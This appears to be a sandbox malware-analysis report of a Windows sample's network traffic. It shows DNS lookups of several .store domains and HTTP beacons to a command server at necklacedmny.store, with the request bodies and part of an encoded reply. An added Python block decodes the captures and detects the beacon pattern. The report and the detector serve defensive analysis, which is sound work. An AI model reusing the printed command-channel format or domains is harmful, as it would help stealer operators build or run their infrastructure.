Oct 31, 2024 17:26:05.050846100 CET  443          49705      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:06.295828104 CET  443          49705      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:06.295861006 CET  443          49705      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:06.295933008 CET  49705        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:06.295990944 CET  443          49705      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:06.298738003 CET  443          49705      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:06.298765898 CET  443          49705      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:06.298794031 CET  49705        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:06.298815012 CET  443          49705      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:06.298883915 CET  49705        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:06.300587893 CET  443          49705      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:06.302227020 CET  443          49705      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:06.302249908 CET  443          49705      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:06.302269936 CET  49705        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:06.302277088 CET  443          49705      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:06.302349091 CET  49705        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:06.412525892 CET  443          49705      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:06.414377928 CET  443          49705      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:06.414418936 CET  443          49705      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:06.414447069 CET  443          49705      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:06.414463043 CET  49705        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:06.414484024 CET  443          49705      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:06.414506912 CET  49705        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:06.414551973 CET  443          49705      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:06.414612055 CET  49705        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:06.428919077 CET  49705        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:06.428958893 CET  443          49705      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:06.428992987 CET  49705        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:06.429007053 CET  443          49705      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:06.818850040 CET  49706        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:06.818897009 CET  443          49706      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:06.818979025 CET  49706        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:06.819303036 CET  49706        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:06.819319010 CET  443          49706      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:07.427362919 CET  443          49706      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:07.427536964 CET  49706        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:07.429143906 CET  49706        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:07.429157019 CET  443          49706      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:07.429416895 CET  443          49706      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:07.431004047 CET  49706        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:07.431170940 CET  49706        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:07.431194067 CET  443          49706      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:08.933825016 CET  443          49706      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:08.933919907 CET  443          49706      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:08.934010029 CET  49706        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:08.934178114 CET  49706        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:08.934195042 CET  443          49706      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:09.035737991 CET  49707        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:09.035778999 CET  443          49707      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:09.035851002 CET  49707        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:09.036222935 CET  49707        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:09.036240101 CET  443          49707      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:09.643498898 CET  443          49707      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:09.643578053 CET  49707        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:09.645777941 CET  49707        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:09.645787954 CET  443          49707      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:09.646053076 CET  443          49707      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:09.648694038 CET  49707        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:09.648827076 CET  49707        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:09.648852110 CET  443          49707      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:09.648905039 CET  49707        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:09.648910999 CET  443          49707      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:10.884015083 CET  443          49707      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:10.884095907 CET  443          49707      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:10.884151936 CET  49707        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:10.884283066 CET  49707        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:10.884299040 CET  443          49707      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:11.214601994 CET  49708        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:11.214654922 CET  443          49708      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:11.214771986 CET  49708        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:11.215162992 CET  49708        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:11.215179920 CET  443          49708      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:11.826829910 CET  443          49708      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:11.826936007 CET  49708        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:11.828630924 CET  49708        443        192.168.2.5    188.114.97.3
                                                                            Oct 31, 2024 17:26:11.828644991 CET44349708188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:11.828877926 CET44349708188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:11.830250025 CET49708443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:11.830403090 CET49708443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:11.830425978 CET44349708188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:11.830506086 CET49708443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:11.830516100 CET44349708188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:13.601711035 CET44349708188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:13.601805925 CET44349708188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:13.601902962 CET49708443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:13.602401972 CET49708443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:13.602427006 CET44349708188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:14.209487915 CET49709443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:14.209518909 CET44349709188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:14.209606886 CET49709443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:14.209944010 CET49709443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:14.209954977 CET44349709188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:14.841450930 CET44349709188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:14.841619968 CET49709443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:14.843786001 CET49709443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:14.843792915 CET44349709188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:14.843992949 CET44349709188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:14.847901106 CET49709443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:14.848609924 CET49709443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:14.848614931 CET44349709188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:15.568778992 CET44349709188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:15.568859100 CET44349709188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:15.569092989 CET49709443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:15.569120884 CET49709443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.002660036 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.002763033 CET44349710188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:16.002859116 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.003217936 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.003252983 CET44349710188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:16.600806952 CET44349710188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:16.600929022 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.602370977 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.602386951 CET44349710188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:16.602600098 CET44349710188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:16.603929996 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.604696035 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.604736090 CET44349710188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:16.604887009 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.604926109 CET44349710188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:16.605074883 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.605135918 CET44349710188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:16.605329037 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.605365992 CET44349710188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:16.605597973 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.605642080 CET44349710188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:16.605868101 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.605905056 CET44349710188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:16.605930090 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.605957985 CET44349710188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:16.606065989 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.606102943 CET44349710188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:16.606152058 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.606268883 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.606307983 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.615008116 CET44349710188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:16.615274906 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.615338087 CET44349710188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:16.615379095 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.615487099 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.621104956 CET44349710188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:18.493678093 CET44349710188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:18.493781090 CET44349710188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:18.493856907 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:18.493937016 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:18.493977070 CET44349710188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:18.521296978 CET49713443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:18.521336079 CET44349713188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:18.521409988 CET49713443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:18.521745920 CET49713443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:18.521760941 CET44349713188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:18.763887882 CET49713443192.168.2.5188.114.97.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 31, 2024 17:26:02.774640083 CET | 60947 | 53 | 192.168.2.5 | 1.1.1.1
Oct 31, 2024 17:26:02.790278912 CET | 53 | 60947 | 1.1.1.1 | 192.168.2.5
Oct 31, 2024 17:26:02.797777891 CET | 55927 | 53 | 192.168.2.5 | 1.1.1.1
Oct 31, 2024 17:26:02.809257030 CET | 53 | 55927 | 1.1.1.1 | 192.168.2.5
Oct 31, 2024 17:26:02.812762976 CET | 62287 | 53 | 192.168.2.5 | 1.1.1.1
Oct 31, 2024 17:26:02.822554111 CET | 53 | 62287 | 1.1.1.1 | 192.168.2.5
Oct 31, 2024 17:26:02.824202061 CET | 56217 | 53 | 192.168.2.5 | 1.1.1.1
Oct 31, 2024 17:26:02.834779024 CET | 53 | 56217 | 1.1.1.1 | 192.168.2.5
Oct 31, 2024 17:26:02.837665081 CET | 51900 | 53 | 192.168.2.5 | 1.1.1.1
Oct 31, 2024 17:26:02.850158930 CET | 53 | 51900 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 31, 2024 17:26:02.774640083 CET | 192.168.2.5 | 1.1.1.1 | 0xefdc | Standard query (0) | presticitpo.store | A (IP address) | IN (0x0001) | false
Oct 31, 2024 17:26:02.797777891 CET | 192.168.2.5 | 1.1.1.1 | 0x999a | Standard query (0) | crisiwarny.store | A (IP address) | IN (0x0001) | false
Oct 31, 2024 17:26:02.812762976 CET | 192.168.2.5 | 1.1.1.1 | 0x6f0d | Standard query (0) | fadehairucw.store | A (IP address) | IN (0x0001) | false
Oct 31, 2024 17:26:02.824202061 CET | 192.168.2.5 | 1.1.1.1 | 0x5270 | Standard query (0) | thumbystriw.store | A (IP address) | IN (0x0001) | false
Oct 31, 2024 17:26:02.837665081 CET | 192.168.2.5 | 1.1.1.1 | 0x1410 | Standard query (0) | necklacedmny.store | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 31, 2024 17:26:02.790278912 CET | 1.1.1.1 | 192.168.2.5 | 0xefdc | Name error (3) | presticitpo.store | none | none | A (IP address) | IN (0x0001) | false
Oct 31, 2024 17:26:02.809257030 CET | 1.1.1.1 | 192.168.2.5 | 0x999a | Name error (3) | crisiwarny.store | none | none | A (IP address) | IN (0x0001) | false
Oct 31, 2024 17:26:02.822554111 CET | 1.1.1.1 | 192.168.2.5 | 0x6f0d | Name error (3) | fadehairucw.store | none | none | A (IP address) | IN (0x0001) | false
Oct 31, 2024 17:26:02.834779024 CET | 1.1.1.1 | 192.168.2.5 | 0x5270 | Name error (3) | thumbystriw.store | none | none | A (IP address) | IN (0x0001) | false
Oct 31, 2024 17:26:02.850158930 CET | 1.1.1.1 | 192.168.2.5 | 0x1410 | No error (0) | necklacedmny.store | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 17:26:02.850158930 CET | 1.1.1.1 | 192.168.2.5 | 0x1410 | No error (0) | necklacedmny.store | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                                                                            • necklacedmny.store
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 188.114.97.3 | 443 | 1532 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-31 16:26:03 UTC | 265 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: necklacedmny.store
2024-10-31 16:26:03 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2024-10-31 16:26:04 UTC | 1011 | IN | HTTP/1.1 200 OK
    Date: Thu, 31 Oct 2024 16:26:04 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=2pudb78rap6b38qoip3ms2s69t; expires=Mon, 24-Feb-2025 10:12:43 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wjdJTI3Nh5VCc8q9qw6sEHizGQNNX66fsX6FIOURj5DHlX5wBgaUhndjQZB5byRRAlKi88ZQPjaGIJt6IZxROVGmASL5Jrfbzp54WHRM%2BVDiRz1uZLjQCzLfX2ra5A3n%2BAZj99s%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8db5012e5e29e70e-DFW
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1086&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=909&delivery_rate=2562831&cwnd=251&unsent_bytes=0&cid=f1bfcce431b669ac&ts=831&x=0"
2024-10-31 16:26:04 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
    Data Ascii: 2ok
2024-10-31 16:26:04 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


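The DNS answers above (four NXDOMAIN replies, then one name that resolves to Cloudflare addresses) and the /api sessions recorded for necklacedmny.store show the sample's domain-list fallback and its beacon format: a POST to /api with a form-encoded body whose act field names the command, answered with a chunked body ("2\r\nok\r\n" followed by the "0\r\n\r\n" terminator for act=life). The following Python is an added example, not part of the Joe Sandbox report and not the malware's own code: it turns the report's Data Raw hex dumps into bytes, reassembles the HTTP/1.1 chunked reply, and applies a detection heuristic built from this capture. The hex inputs are copied from the report; the 14-byte slice of the second session's reply, the function names, and the min_nxdomain threshold are assumptions made for illustration.

```python
"""Decode the Data Raw hex dumps of the /api sessions, reassemble the chunked
reply and classify the beacon. Inputs below are copied from this report."""
from urllib.parse import parse_qs

# Session 0: request body "act=life" and the two chunks of the reply.
SESSION0_REQUEST_BODY_HEX = "61 63 74 3d 6c 69 66 65"
SESSION0_RESPONSE_HEX = [
    "32 0d 0a 6f 6b 0d 0a",   # "2\r\nok\r\n": one 2-byte chunk
    "30 0d 0a 0d 0a",         # "0\r\n\r\n": terminating chunk
]

# Session 1: request body and, as an assumed truncation, only the first
# 14 bytes of the reply (chunk-size line plus 8 bytes of the 0x2575-byte chunk).
SESSION1_REQUEST_BODY_HEX = (
    "61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d "
    "34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 "
    "72 79 79 26 6a 3d"
)
SESSION1_RESPONSE_HEX = ["32 35 37 35 0d 0a 68 57 32 6a 2b 51 63 2f"]

# DNS answers from the report as (name, RCODE): 3 = NXDOMAIN, 0 = NOERROR.
DNS_ANSWERS = [
    ("presticitpo.store", 3),
    ("crisiwarny.store", 3),
    ("fadehairucw.store", 3),
    ("thumbystriw.store", 3),
    ("necklacedmny.store", 0),
]


def hexdump_to_bytes(dumps):
    """Join one or more space-separated hex dumps into a byte string."""
    return b"".join(bytes.fromhex(d) for d in dumps)


def dechunk(raw):
    """Decode an HTTP/1.1 chunked body. Returns (body, complete); complete is
    False when the data ends before the zero-length terminator, which is what a
    truncated capture looks like. The partial body is still returned."""
    body = bytearray()
    pos = 0
    while True:
        eol = raw.find(b"\r\n", pos)
        if eol <= pos:                      # no size line, or an empty one
            return bytes(body), False
        size = int(raw[pos:eol].split(b";")[0].strip(), 16)   # drop chunk extensions
        if size == 0:
            return bytes(body), True
        start = eol + 2
        chunk = raw[start:start + size]
        body += chunk
        if len(chunk) < size or raw[start + size:start + size + 2] != b"\r\n":
            return bytes(body), False
        pos = start + size + 2


def declared_chunk_size(raw):
    """Size announced by the first chunk-size line (0x2575 = 9589 in session 1)."""
    return int(raw[:raw.find(b"\r\n")], 16)


def classify_beacon(method, path, body):
    """Heuristic taken from this capture: POST /api with a form-encoded body whose
    'act' field names the command (life, recive_message). Returns the parsed
    fields, or None when the request does not fit the pattern."""
    if method != "POST" or path != "/api":
        return None
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    return fields if "act" in fields else None


def dns_fallback_pattern(answers, min_nxdomain=3):
    """Flag the domain-list fallback seen above: several NXDOMAIN answers followed
    by one name that resolves. The threshold is an assumption."""
    nxdomain = [name for name, rcode in answers if rcode == 3]
    resolved = [name for name, rcode in answers if rcode == 0]
    if len(nxdomain) >= min_nxdomain and resolved:
        return {"nxdomain": nxdomain, "resolved": resolved}
    return None


if __name__ == "__main__":
    reply, complete = dechunk(hexdump_to_bytes(SESSION0_RESPONSE_HEX))
    print("session 0 reply:", reply, "(complete)" if complete else "(truncated)")
    print("session 0 beacon:", classify_beacon(
        "POST", "/api", hexdump_to_bytes([SESSION0_REQUEST_BODY_HEX]).decode()))
    raw1 = hexdump_to_bytes(SESSION1_RESPONSE_HEX)
    reply, complete = dechunk(raw1)
    print("session 1 reply: first chunk announces", declared_chunk_size(raw1),
          "bytes;", len(reply), "seen", "(complete)" if complete else "(truncated)")
    print("session 1 beacon:", classify_beacon(
        "POST", "/api", hexdump_to_bytes([SESSION1_REQUEST_BODY_HEX]).decode()))
    print("dns fallback:", dns_fallback_pattern(DNS_ANSWERS))
```

Run as a script it prints the decoded "ok" reply for session 0, the parsed act=recive_message fields (including the lid value and the empty j field) for session 1, the 9589-byte chunk size the second reply announces, and the list of NXDOMAIN names that preceded the one successful lookup. The dechunk function deliberately reports incompleteness instead of raising, because sandbox captures like this one are cut off mid-chunk and the partial payload is still worth inspecting.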
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49705 | 188.114.97.3 | 443 | 1532 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-31 16:26:05 UTC | 266 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 52
    Host: necklacedmny.store
2024-10-31 16:26:05 UTC | 52 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
    Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
2024-10-31 16:26:06 UTC | 1014 | IN | HTTP/1.1 200 OK
    Date: Thu, 31 Oct 2024 16:26:06 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=0gpvqof3724stk2bc0h8egk5ft; expires=Mon, 24-Feb-2025 10:12:44 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tyAqxQSXBFgZUGz78TO6ZgqBQrHrOxr8lwaKtfhGBGlptJz8z%2Fn6d7Rl1KBye9rVl6ZnTJYDF%2BHkbtXfGA0ii0pUwqGJ62Yv09eNtn2gAFaUxLO9VANYli%2BPg8to4VzQ7eACGMw%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8db50135fe0a8d29-DFW
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1478&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=954&delivery_rate=2043754&cwnd=251&unsent_bytes=0&cid=233b9b115ac48e28&ts=1254&x=0"
2024-10-31 16:26:06 UTC | 355 | IN | Data Raw: 32 35 37 35 0d 0a 68 57 32 6a 2b 51 63 2f 69 2f 31 75 58 34 51 77 4a 47 33 77 6b 4d 48 49 34 53 66 67 43 4f 32 54 7a 5a 32 50 45 35 6a 68 67 75 66 2b 54 39 58 62 50 51 75 6e 33 78 30 36 70 67 70 51 48 34 58 31 37 65 71 41 51 38 49 79 69 2f 4b 68 37 75 6f 2f 75 70 66 76 78 62 38 4c 77 70 56 30 57 71 66 66 43 79 65 6d 43 6e 38 57 30 76 57 76 36 74 73 46 68 57 4b 50 38 71 48 2f 37 6e 6a 33 6b 65 36 45 37 51 48 45 6b 57 4a 63 37 35 77 43 4d 75 46 56 51 51 79 61 2f 71 69 6c 69 55 72 43 4a 4d 2f 32 74 37 2b 31 4d 64 57 45 39 6f 62 49 44 4e 43 53 4a 55 4b 6e 68 6b 77 36 36 68 49 65 54 35 48 31 6f 36 53 48 51 34 74 67 68 66 75 70 2f 75 74 35 36 49 6a 6b 6a 2b 30 50 78 35 42 6f 56 66 75 52 43 44 58 71 55 30 73 4d 30 72 7a 6a 72 5a 73 46 32 69 72 63 77 36 7a 75 2f
    Data Ascii: 2575hW2j+Qc/i/1uX4QwJG3wkMHI4SfgCO2TzZ2PE5jhguf+T9XbPQun3x06pgpQH4X17eqAQ8Iyi/Kh7uo/upfvxb8LwpV0WqffCyemCn8W0vWv6tsFhWKP8qH/7nj3ke6E7QHEkWJc75wCMuFVQQya/qiliUrCJM/2t7+1MdWE9obIDNCSJUKnhkw66hIeT5H1o6SHQ4tghfup/ut56Ijkj+0Px5BoVfuRCDXqU0sM0rzjrZsF2ircw6zu/
2024-10-31 16:26:06 UTC | 1369 | IN | Data Raw: 4f 6d 4e 42 44 62 74 56 31 51 45 6d 2f 2b 75 71 6f 35 50 6a 57 6d 50 39 71 58 31 34 6e 76 2b 6a 75 32 44 35 77 2b 42 31 53 56 61 38 64 39 55 66 63 56 58 56 67 69 65 35 4f 47 51 77 31 72 4d 63 38 2f 32 6f 37 2b 31 4d 66 4b 47 34 34 62 73 41 4d 4b 54 62 6b 2f 70 6a 51 6f 77 34 30 42 41 43 70 7a 34 6f 4c 69 4a 53 34 52 70 68 76 71 6d 2b 75 70 31 75 73 32 67 67 76 39 50 6d 64 74 45 55 4f 4b 54 42 69 72 6d 45 6c 6c 42 69 37 4b 6b 70 73 4d 64 77 6d 36 4f 39 61 37 37 34 33 2f 2b 6a 2b 61 4c 36 67 44 48 6b 57 56 61 34 35 63 45 50 4f 74 5a 53 51 2b 58 2f 36 65 73 6a 30 53 48 4b 73 47 78 71 4f 65 74 4b 62 71 74 35 34 62 31 54 66 53 59 61 31 50 75 69 55 77 69 71 45 73 47 43 4a 36 79 2b 2b 71 4e 51 49 31 34 6a 75 4f 71 38 66 39 39 2f 34 58 74 68 75 6b 50 78 4a 78 6f
    Data Ascii: OmNBDbtV1QEm/+uqo5PjWmP9qX14nv+ju2D5w+B1SVa8d9UfcVXVgie5OGQw1rMc8/2o7+1MfKG44bsAMKTbk/pjQow40BACpz4oLiJS4Rphvqm+up1us2ggv9PmdtEUOKTBirmEllBi7KkpsMdwm6O9a7743/+j+aL6gDHkWVa45cEPOtZSQ+X/6esj0SHKsGxqOetKbqt54b1TfSYa1PuiUwiqEsGCJ6y++qNQI14juOq8f99/4XthukPxJxo
